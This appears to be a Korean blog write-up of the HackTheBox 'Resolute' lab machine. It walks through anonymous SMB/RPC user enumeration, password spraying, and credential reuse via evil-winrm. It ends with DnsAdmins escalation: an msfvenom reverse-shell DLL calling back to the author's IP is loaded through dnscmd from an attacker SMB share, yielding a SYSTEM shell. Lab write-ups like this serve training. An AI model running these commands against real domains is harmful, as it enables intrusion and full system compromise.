상세 컨텐츠

본문 제목

[HackTheBox] Resolute

Penetration/HackTheBox

by obscurity_ 2024. 11. 3. 19:47

본문

 

53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
 

 

서버에 열려있는 포트로 보아 컨트롤러 같습니다.

53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 09:11:33Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?                                                              
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped                                                             
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                                                                 
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Host script results:                                                                    
| smb-security-mode:   
|   account_used: <blank>                  
|   authentication_level: user                                                          
|   challenge_response: supported                                                       
|_  message_signing: required                                                           
| smb-os-discovery:                                                                     
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute                                                             
|   NetBIOS computer name: RESOLUTE\x00                                                 
|   Domain name: megabank.local                                                         
|   Forest name: megabank.local                                                         
|   FQDN: Resolute.megabank.local
|_  System time: 2024-10-30T02:12:23-07:00                                              
|_clock-skew: mean: 2h14m33s, deviation: 4h02m30s, median: -5m27s                       
| smb2-security-mode: 
|   3:1:1:           
|_    Message signing enabled and required
| smb2-time:                  
|   date: 2024-10-30T09:12:24    
|_  start_date: 2024-10-30T06:31:34
 

그리고 자세한 스캔에서 FQDN과 도메인 이름 등을 수집할 수 있었습니다.

이 정보들을 hosts와 resolve.conf에 추가해줍니다.

SMB에 대해서 익명 로그인이 가능하길래

users 플래그를 통해서 유저 목록을 확인해봤는데 유저 목록이 출력됩니다.

 

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u '' -p '' --users 
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
SMB         10.10.10.169    445    RESOLUTE         -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.10.169    445    RESOLUTE         Administrator                 2024-10-30 09:15:02 0       Built-in account for administering the computer/domain 
SMB         10.10.10.169    445    RESOLUTE         Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.10.169    445    RESOLUTE         krbtgt                        2019-09-25 13:29:12 0       Key Distribution Center Service Account 
SMB         10.10.10.169    445    RESOLUTE         DefaultAccount                <never>             0       A user account managed by the system. 
SMB         10.10.10.169    445    RESOLUTE         ryan                          2024-10-30 09:15:02 0        
SMB         10.10.10.169    445    RESOLUTE         marko                         2019-09-27 13:17:14 0       Account created. Password set to Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         sunita                        2019-12-03 21:26:29 0        
SMB         10.10.10.169    445    RESOLUTE         abigail                       2019-12-03 21:27:30 0        
SMB         10.10.10.169    445    RESOLUTE         marcus                        2019-12-03 21:27:59 0        
SMB         10.10.10.169    445    RESOLUTE         sally                         2019-12-03 21:28:29 0        
SMB         10.10.10.169    445    RESOLUTE         fred                          2019-12-03 21:29:01 0        
SMB         10.10.10.169    445    RESOLUTE         angela                        2019-12-03 21:29:43 0        
SMB         10.10.10.169    445    RESOLUTE         felicia                       2019-12-03 21:30:53 0        
SMB         10.10.10.169    445    RESOLUTE         gustavo                       2019-12-03 21:31:42 0        
SMB         10.10.10.169    445    RESOLUTE         ulf                           2019-12-03 21:32:19 0        
SMB         10.10.10.169    445    RESOLUTE         stevie                        2019-12-03 21:33:13 0        
SMB         10.10.10.169    445    RESOLUTE         claire                        2019-12-03 21:33:44 0        
SMB         10.10.10.169    445    RESOLUTE         paulo                         2019-12-03 21:34:46 0        
SMB         10.10.10.169    445    RESOLUTE         steve                         2019-12-03 21:35:25 0        
SMB         10.10.10.169    445    RESOLUTE         annette                       2019-12-03 21:36:55 0        
SMB         10.10.10.169    445    RESOLUTE         annika                        2019-12-03 21:37:23 0        
SMB         10.10.10.169    445    RESOLUTE         per                           2019-12-03 21:38:12 0        
SMB         10.10.10.169    445    RESOLUTE         claude                        2019-12-03 21:39:56 0        
SMB         10.10.10.169    445    RESOLUTE         melanie                       2024-10-30 09:15:02 0        
SMB         10.10.10.169    445    RESOLUTE         zach                          2019-12-04 10:39:27 0        
SMB         10.10.10.169    445    RESOLUTE         simon                         2019-12-04 10:39:58 0        
SMB         10.10.10.169    445    RESOLUTE         naoki                         2019-12-04 10:40:44 0 
 

 

이것을 SMBUsers.txt에 저장해주고 브루트포스 포맷으로 변환해줍니다.

그리고 AS-REP-Roasting 공격을 해봤는데 취약한 유저는 없습니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-GetNPUsers megabank.local/'' -usersfile SMBUsers.txt -dc-ip 10.10.10.169           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
 

 

한편 msrpc에 익명 바인딩을 한 뒤에 쿼리를 날려보니

쿼리를 사용할 권한이 있습니다.

msrpc에 대해서 익명 바인딩과 쿼리 사용을 허용해둔 것 같습니다.

 

┌──(root㉿kali)-[~/Pentest/Machine]
└─# rpcclient -U "" -N megabank.local  
rpcclient $> querydominfo
Domain:         MEGABANK
Server:
Comment:
Total Users:    79
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
 

 

dispinfo를 통해서 유저 정보를 확인했는데

marko라는 계정의 패스워드가 생성되었을 때 Welcome123!으로

설정되었다는 설명이 보입니다.

 

rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
 

 

그래서 아까전에 SMBUsers.txt에 있는 계정 목록 중에서

Welcome123!으로 로그인이 되는 유저가 있는지 스프레잉 공격을 해줍니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u SMBUsers.txt -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE 
 

 

그리고 melanie 계정에서 해당 패스워드로 로그인이 성공합니다.

nxc를 통해서 melanie 계정이 Remote 유저인 것을 확인해서

evil-winrm을 통해 melanie 사용자 쉘을 획득할 수 있습니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u melanie -p 'Welcome123!'     
WINRM       10.10.10.169    5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u melanie -p Welcome123!                      
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
 

 

언제나 그렇듯이 초기침투에 성공하면 먼저 권한과 그룹을 확인해주고

파워쉘 히스토리 파일을 찾아봤는데 숨겨져 있던 히든 파일인

파워쉘 히스토리가 발견됩니다.

 

*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "*PowerShell*.txt"


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
 

 

해당 파워쉘 히스토리를 읽어서 파이프라인으로 ps.txt로 저장한다음

이것을 칼리 로컬로 다운로드 합니다.

*Evil-WinRM* PS C:\Users\melanie\Documents> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt > ps.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download ps.txt
                                        
Info: Downloading C:\Users\melanie\Documents\ps.txt to ps.txt
                                        
Info: Download successful!
 

그리고 해당 파워쉘 히스토리에서는 ryan 계정으로 SMB를 연결하려는 시도가 보이며 이곳에서 패스워드 정보가 하드코딩 되어있습니다.

 

ryan : Serv3r4Admin4cc123!

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u ryan -p 'Serv3r4Admin4cc123!'             
WINRM       10.10.10.169    5985   RESOLUTE         [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u ryan -p 'Serv3r4Admin4cc123!'               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
 

획득한 ryan 사용자도 Remote Management User이어서

winrm으로 연결이 되었습니다.

반면 ryan 계정은 DnsAdmins 그룹에 속해있습니다.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

 

DnsAdmins는 DNS 서비스를 관리할 수 있는 그룹인데

이 그룹에 속해있으면 DNS 서비스의 dll 경로를 변조하여

악성코드를 업로드한 다음 DNS 서비스를 재실행하여

시스템 권한을 획득할 수 있습니다.

 

자세한 내용은 아래 글을 참조합니다.

https://blog.naver.com/diary_yw/223627869663

 

먼저 dll 악성파일을 만들기 위해서 msfvenom을 이용합니다.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f dll > rev.dll
 

그리고 이 동적라이브러리를 가져갈 수 있도록 서버를 열어줍니다.

impacket-smbserver share -smb2support . 
 

msfvenom으로 악성코드를 만들 때 포트를 4444로 지정했으므로

ncat을 이용해서 4444포트를 열어둡니다.

nc -lvnp 4444
 

 

마지막으로 서버에서 DNS 참조 링크를 칼리 smb 서버 경로로 지정한 다음

sc.exe를 사용해서 dns 서비스를 재실행 해주면 끝입니다.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.21\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 644
        FLAGS 
 

 

이렇게 재실행 했을 때 먼저 열려있던 칼리 smb 서버에 접속하여

dll 파일을 가져갑니다.

그 기록은 칼리 터미널에 남습니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share -smb2support .                                                       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,57920)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:c4cf63c48f5e74889f9771b7e0e747f1:010100000000000000d5ad10b02adb019ab1416c88401bcb00000000010010004c004100720078007300490077006300030010004c00410072007800730049007700630002001000650076005300670072006a005400550004001000650076005300670072006a00540055000700080000d5ad10b02adb0106000400020000000800300030000000000000000000000000400000f6a498ccbba2aaa00cd38aa8e271e8ea695faac0038a4ca3c3730c2b4795de0f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320031000000000000000000
 

 

그 다음 가져간 dll 파일을 실행하면 리버스쉘 연결을 시도하게 될 것이고

대기중이던 포트에는 시스템 쉘이 획득됩니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444                                                                                                                                            
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.169] 57922
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
 

 

 

'Penetration > HackTheBox' 카테고리의 다른 글

[HackTheBox] Administrator  (0) 2024.12.12
[HackTheBox] Blackfield  (1) 2024.10.30
[HackTheBox] Search  (1) 2024.10.30
[HackTheBox] Active  (0) 2024.10.29
[HackTheBox] Sauna  (1) 2024.10.29

관련글 더보기